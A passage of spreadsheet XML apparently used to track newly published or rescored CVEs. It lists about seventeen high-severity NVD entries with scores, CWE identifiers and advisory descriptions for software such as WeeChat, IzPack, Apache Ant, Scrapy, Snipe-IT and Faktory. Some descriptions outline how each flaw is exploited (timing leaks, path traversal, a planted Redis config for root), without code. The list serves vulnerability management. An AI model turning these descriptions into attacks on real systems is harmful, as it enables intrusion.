      </c>
    </row>
    <row r="532">
      <c r="A532" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B532" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C532" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53525</t>
        </is>
      </c>
      <c r="D532" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E532" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F532" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G532" s="5" t="inlineStr"/>
      <c r="H532" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I532" s="5" t="inlineStr"/>
      <c r="J532" s="5" t="inlineStr"/>
      <c r="K532" s="5" t="inlineStr"/>
      <c r="L532" s="5" t="inlineStr"/>
      <c r="M532" s="5" t="inlineStr"/>
      <c r="N532" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O532" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P532" s="5" t="inlineStr"/>
      <c r="Q532" s="5" t="inlineStr">
        <is>
          <t>CWE-208</t>
        </is>
      </c>
      <c r="R532" s="5" t="inlineStr">
        <is>
          <t>WeeChat (Wee Enhanced Environment for Chat) is a free chat client. In versions 0.3.1 through 4.9.0, the WeeChat relay authentication uses non-constant-time string comparison functions (weechat_strcasecmp and strcmp) to verify password hashes and plaintext passwords. An attacker can exploit timing differences to extract the server-computed hash character by character, then authenticate using the correct hash without knowing the password. Version 4.9.1 fixes the issue.</t>
        </is>
      </c>
      <c r="S532" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53525</t>
        </is>
      </c>
    </row>
    <row r="533">
      <c r="A533" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B533" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C533" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54550</t>
        </is>
      </c>
      <c r="D533" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E533" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F533" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G533" s="5" t="inlineStr"/>
      <c r="H533" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I533" s="5" t="inlineStr"/>
      <c r="J533" s="5" t="inlineStr"/>
      <c r="K533" s="5" t="inlineStr"/>
      <c r="L533" s="5" t="inlineStr"/>
      <c r="M533" s="5" t="inlineStr"/>
      <c r="N533" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O533" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P533" s="5" t="inlineStr"/>
      <c r="Q533" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R533" s="5" t="inlineStr">
        <is>
          <t>IzPack is a widely used tool for packaging applications on the Java platform as cross-platform installers. In 5.2.6 and earlier, UnpackerBase.unpack() in izpack-installer/src/main/java/com/izforge/izpack/installer/unpacker/UnpackerBase.java obtains an attacker-controlled PackFile targetPath, passes it through IoHelper.translatePath(), which only converts separators, and constructs a File without normalizing parent-directory segments or enforcing destination containment. A malicious installer pack entry containing ../ sequences can therefore write outside the intended installation directory to startup folders, executable search paths, or other locations accessible with the victim's privileges when the victim runs the installer.</t>
        </is>
      </c>
      <c r="S533" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54550</t>
        </is>
      </c>
    </row>
    <row r="534">
      <c r="A534" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B534" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C534" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56135</t>
        </is>
      </c>
      <c r="D534" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E534" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F534" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G534" s="5" t="inlineStr"/>
      <c r="H534" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I534" s="5" t="inlineStr"/>
      <c r="J534" s="5" t="inlineStr"/>
      <c r="K534" s="5" t="inlineStr"/>
      <c r="L534" s="5" t="inlineStr"/>
      <c r="M534" s="5" t="inlineStr"/>
      <c r="N534" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O534" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="P534" s="5" t="inlineStr"/>
      <c r="Q534" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R534" s="5" t="inlineStr">
        <is>
          <t>In NTFS-3G through 2026.2.25, a heap-based buffer overflow exists in the function build_inherited_id() in libntfs-3g/security.c that allows an attacker to corrupt heap memory in the SUID-root ntfs-3g binary by crafting a malicious NTFS image. The overflow is triggered by creating a file in a crafted directory.</t>
        </is>
      </c>
      <c r="S534" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56135</t>
        </is>
      </c>
    </row>
    <row r="535">
      <c r="A535" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B535" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C535" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71622</t>
        </is>
      </c>
      <c r="D535" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E535" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F535" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G535" s="5" t="inlineStr"/>
      <c r="H535" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I535" s="5" t="inlineStr"/>
      <c r="J535" s="5" t="inlineStr"/>
      <c r="K535" s="5" t="inlineStr"/>
      <c r="L535" s="5" t="inlineStr"/>
      <c r="M535" s="5" t="inlineStr"/>
      <c r="N535" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O535" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P535" s="5" t="inlineStr"/>
      <c r="Q535" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R535" s="5" t="inlineStr">
        <is>
          <t>SQL injection vulnerability in Zhao-github APiAdmin v.5.0.1 allows a remote attacker to obtain sensitive information via the User.php component</t>
        </is>
      </c>
      <c r="S535" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71622</t>
        </is>
      </c>
    </row>
    <row r="536">
      <c r="A536" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B536" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C536" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78254</t>
        </is>
      </c>
      <c r="D536" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E536" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F536" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G536" s="5" t="inlineStr"/>
      <c r="H536" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I536" s="5" t="inlineStr"/>
      <c r="J536" s="5" t="inlineStr"/>
      <c r="K536" s="5" t="inlineStr">
        <is>
          <t>apache:ant</t>
        </is>
      </c>
      <c r="L536" s="5" t="inlineStr"/>
      <c r="M536" s="5" t="inlineStr"/>
      <c r="N536" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O536" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P536" s="5" t="inlineStr"/>
      <c r="Q536" s="5" t="inlineStr">
        <is>
          <t>CWE-23</t>
        </is>
      </c>
      <c r="R536" s="5" t="inlineStr">
        <is>
          <t>The ftp and scp tasks of Apache Ant can download files from a remote server. A malicious server can provide relative paths that allow it to write outside of the dedicated target directory for the download, making it possible to overwrite files of the attacker's choice using the permissions of the user running Ant in versions prior to Ant 1.10.18. 
In order to exploit this vulnerability, the server would either have to be malicious or be subject to a machine-in-the-middle attack. Additionally in the case of scp or the ftp task using ftps the server must pass the server identity checks performed by the tasks.
For ftp tasks not using ftps a malicious server could act as a machine-in-the-middle to provide malicious files.
Starting with Ant 1.10.18 both tasks will prevent writing outside of the destination directory by default. An option is available to disable this behavior in the unlikely case that the  old behavior is required by existing build files.
Mitigations:
Users of scp and ftp (when using ftps) in any version of Ant should not bypass server identity checks. Users of ftp not using ftps should switch to ftps where possible.
All users are recommended to upgrade to Apache Ant 1.10.18, which fixes this issue.</t>
        </is>
      </c>
      <c r="S536" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78254</t>
        </is>
      </c>
    </row>
    <row r="537">
      <c r="A537" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B537" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C537" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78492</t>
        </is>
      </c>
      <c r="D537" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E537" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F537" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G537" s="5" t="inlineStr"/>
      <c r="H537" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I537" s="5" t="inlineStr"/>
      <c r="J537" s="5" t="inlineStr"/>
      <c r="K537" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L537" s="5" t="inlineStr"/>
      <c r="M537" s="5" t="inlineStr"/>
      <c r="N537" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O537" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P537" s="5" t="inlineStr"/>
      <c r="Q537" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="R537"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537" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78492</t>
        </is>
      </c>
    </row>
    <row r="538">
      <c r="A538" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B538" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C538" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78494</t>
        </is>
      </c>
      <c r="D538" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E538" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F538" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G538" s="5" t="inlineStr"/>
      <c r="H538" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I538" s="5" t="inlineStr"/>
      <c r="J538" s="5" t="inlineStr"/>
      <c r="K538" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L538" s="5" t="inlineStr"/>
      <c r="M538" s="5" t="inlineStr"/>
      <c r="N538" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O538" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P538" s="5" t="inlineStr"/>
      <c r="Q538" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="R538"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538" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78494</t>
        </is>
      </c>
    </row>
    <row r="539">
      <c r="A539" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B539" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C539" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79963</t>
        </is>
      </c>
      <c r="D539" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E539" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F539" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G539" s="5" t="inlineStr"/>
      <c r="H539" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I539" s="5" t="inlineStr"/>
      <c r="J539" s="5" t="inlineStr"/>
      <c r="K539" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L539" s="5" t="inlineStr"/>
      <c r="M539" s="5" t="inlineStr"/>
      <c r="N539" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O539" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P539" s="5" t="inlineStr"/>
      <c r="Q539" s="5" t="inlineStr">
        <is>
          <t>CWE-494</t>
        </is>
      </c>
      <c r="R539" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains a Download of Code Without Integrity Check vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to command execution.</t>
        </is>
      </c>
      <c r="S539" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79963</t>
        </is>
      </c>
    </row>
    <row r="540">
      <c r="A540" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B540" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C540" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84366</t>
        </is>
      </c>
      <c r="D540" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E540" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F540" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G540" s="5" t="inlineStr"/>
      <c r="H540" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I540" s="5" t="inlineStr"/>
      <c r="J540" s="5" t="inlineStr"/>
      <c r="K540" s="5" t="inlineStr"/>
      <c r="L540" s="5" t="inlineStr"/>
      <c r="M540" s="5" t="inlineStr"/>
      <c r="N540" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O540" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P540" s="5" t="inlineStr"/>
      <c r="Q540" s="5" t="inlineStr">
        <is>
          <t>CWE-319</t>
        </is>
      </c>
      <c r="R540" s="5" t="inlineStr">
        <is>
          <t>Scrapy is a high-level web crawling and scraping framework for Python. Prior to 2.17.0, in scrapy/core/downloader/handlers/s3.py, Scrapy's S3DownloadHandler converts an S3-scheme bucket and key request into a plaintext HTTP request to the corresponding S3 endpoint unless request.meta["is_secure"] is explicitly enabled, then signs and sends the plaintext request with configured AWS credentials. A network attacker who can observe traffic between Scrapy and S3 can read the bucket and key path, AWS Authorization header, X-Amz-Security-Token when temporary credentials are used, S3 object contents, and S3 response headers. An active man-in-the-middle attacker can also modify the plaintext S3 response body, status code, and headers before Scrapy processes them, causing scraped-data poisoning, poisoned exports, HTTP cache poisoning when caching is enabled, or influence over later crawl targets through forged redirects or attacker-controlled links. Users making S3-scheme requests with AWS credentials are affected. This issue is fixed in version 2.17.0.</t>
        </is>
      </c>
      <c r="S540" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84366</t>
        </is>
      </c>
    </row>
    <row r="541">
      <c r="A541" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B541" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C541" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86746</t>
        </is>
      </c>
      <c r="D541" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E541" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F541" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G541" s="5" t="inlineStr"/>
      <c r="H541" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I541" s="5" t="inlineStr"/>
      <c r="J541" s="5" t="inlineStr"/>
      <c r="K541" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L541" s="5" t="inlineStr"/>
      <c r="M541" s="5" t="inlineStr"/>
      <c r="N541" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O541" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P541" s="5" t="inlineStr"/>
      <c r="Q541" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="R541" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT before 8.7.0 contains an authorization bypass vulnerability in Livewire components that enforce authorization only at the route level, not within component lifecycle methods. Attackers with a valid authenticated session can replay signed component snapshots via POST /livewire/update to invoke protected methods and escalate privileges, including creating OAuth clients, minting personal access tokens, and accessing sensitive admin data.</t>
        </is>
      </c>
      <c r="S541" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86746</t>
        </is>
      </c>
    </row>
    <row r="542">
      <c r="A542" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B542" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C542" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87812</t>
        </is>
      </c>
      <c r="D542" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E542" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F542" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G542" s="5" t="inlineStr"/>
      <c r="H542" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I542" s="5" t="inlineStr"/>
      <c r="J542" s="5" t="inlineStr"/>
      <c r="K542" s="5" t="inlineStr"/>
      <c r="L542" s="5" t="inlineStr"/>
      <c r="M542" s="5" t="inlineStr"/>
      <c r="N542" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O542" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P542" s="5" t="inlineStr"/>
      <c r="Q542" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R542" s="5" t="inlineStr">
        <is>
          <t>SiYuan before v3.8.2 contains a stored cross-site scripting vulnerability in Bazaar package cards where the iconURL metadata is inserted directly into HTML img src attributes without escaping. Attackers can inject malicious URLs with event handlers that execute JavaScript in the authenticated SiYuan origin when users view Bazaar listings, enabling API requests and application state manipulation.</t>
        </is>
      </c>
      <c r="S542" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87812</t>
        </is>
      </c>
    </row>
    <row r="543">
      <c r="A543" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B543" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C543" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-30819</t>
        </is>
      </c>
      <c r="D543" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E543" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F543" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G543" s="5" t="inlineStr"/>
      <c r="H543" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I543" s="5" t="inlineStr"/>
      <c r="J543" s="5" t="inlineStr"/>
      <c r="K543" s="5" t="inlineStr"/>
      <c r="L543" s="5" t="inlineStr"/>
      <c r="M543" s="5" t="inlineStr"/>
      <c r="N543" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O543" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P543" s="5" t="inlineStr"/>
      <c r="Q543" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R543" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web based IT service management tool. Prior to 3.2.3, iTop has a reflected Cross-Site Scripting (XSS) vulnerability in its dashboard revert functionality with the parameter dashboard_id in /pages/ajax.render.php. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="S543" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-30819</t>
        </is>
      </c>
    </row>
    <row r="544">
      <c r="A544" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B544" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C544" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49314</t>
        </is>
      </c>
      <c r="D544" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E544" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F544" s="5" t="inlineStr">
        <is>
          <t>psirt@huawei.com</t>
        </is>
      </c>
      <c r="G544" s="5" t="inlineStr"/>
      <c r="H544" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I544" s="5" t="inlineStr"/>
      <c r="J544" s="5" t="inlineStr"/>
      <c r="K544" s="5" t="inlineStr"/>
      <c r="L544" s="5" t="inlineStr"/>
      <c r="M544" s="5" t="inlineStr"/>
      <c r="N544" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O544" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P544" s="5" t="inlineStr"/>
      <c r="Q544" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R544" s="5" t="inlineStr">
        <is>
          <t>OOB write vulnerability in the rendering and composition module.
Impact: Successful exploitation of this vulnerability may affect availability.</t>
        </is>
      </c>
      <c r="S544" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49314</t>
        </is>
      </c>
    </row>
    <row r="545">
      <c r="A545" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B545" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C545" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55538</t>
        </is>
      </c>
      <c r="D545" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E545" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F545" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G545" s="5" t="inlineStr"/>
      <c r="H545" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I545" s="5" t="inlineStr"/>
      <c r="J545" s="5" t="inlineStr"/>
      <c r="K545" s="5" t="inlineStr"/>
      <c r="L545" s="5" t="inlineStr"/>
      <c r="M545" s="5" t="inlineStr"/>
      <c r="N545" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O545" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P545" s="5" t="inlineStr"/>
      <c r="Q545" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R545" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. Prior to praisonai 4.6.51, praisonai serve agents parses config["api_key"] but _create_agents_app() does not authenticate POST /agents or POST /agents/{agent_name}. Missing or incorrect bearer and X-API-Key values still reach agent execution. This issue is fixed in version 4.6.58.</t>
        </is>
      </c>
      <c r="S545" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55538</t>
        </is>
      </c>
    </row>
    <row r="546">
      <c r="A546" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B546" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C546" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63404</t>
        </is>
      </c>
      <c r="D546" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E546" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F546" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G546" s="5" t="inlineStr"/>
      <c r="H546" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I546" s="5" t="inlineStr"/>
      <c r="J546" s="5" t="inlineStr">
        <is>
          <t>redis</t>
        </is>
      </c>
      <c r="K546" s="5" t="inlineStr"/>
      <c r="L546" s="5" t="inlineStr"/>
      <c r="M546" s="5" t="inlineStr"/>
      <c r="N546" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O546" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P546" s="5" t="inlineStr"/>
      <c r="Q546" s="5" t="inlineStr">
        <is>
          <t>CWE-377</t>
        </is>
      </c>
      <c r="R546" s="5" t="inlineStr">
        <is>
          <t>Faktory is a language-agnostic background job server. In versions prior to 1.10.0, the embedded Redis bootstrapper is vulnerable to an insecure temporary file flaw that lets a local unprivileged user hijack the Redis configuration and escalate to root. It writes its startup configuration to a fixed, predictable, world-writable path, /tmp/redis.conf, only creating the file if it does not already exist and never validating it on later boots. Because /tmp is world-writable, a local unprivileged user can pre-create /tmp/redis.conf with attacker-chosen Redis directives before Faktory starts, and Faktory will use the planted file verbatim. Faktory only overrides the unixsocket, dir, and logfile options, leaving directives such as bind, protected-mode, requirepass, and loadmodule attacker-controlled. This lets an attacker silently expose the entire job queue over an unauthenticated network port with no visible error to the administrator. Because the official systemd unit runs Faktory, and the redis-server child it spawns, as root, an attacker can also supply a loadmodule directive to execute arbitrary native code in the root-owned Redis process, escalating from a local unprivileged user to root. This issue is fixed in version 1.10.0.</t>
        </is>
      </c>
      <c r="S546" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63404</t>
        </is>
      </c>
    </row>
    <row r="547">
      <c r="A547" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B547" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C547" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78485</t>
        </is>
      </c>
      <c r="D547" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E547" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F547" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G547" s="5" t="inlineStr"/>
      <c r="H547" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I547" s="5" t="inlineStr"/>
      <c r="J547" s="5" t="inlineStr"/>
      <c r="K547" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L547" s="5" t="inlineStr"/>
      <c r="M547" s="5" t="inlineStr"/>
      <c r="N547" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O547" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P547" s="5" t="inlineStr"/>
      <c r="Q547" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R547"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Unauthorized access</t>
        </is>
      </c>
      <c r="S547" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78485</t>
        </is>
      </c>
    </row>
    <row r="548">
      <c r="A548" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B548" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C548" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79635</t>
        </is>
      </c>
      <c r="D548" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E548" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F548" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
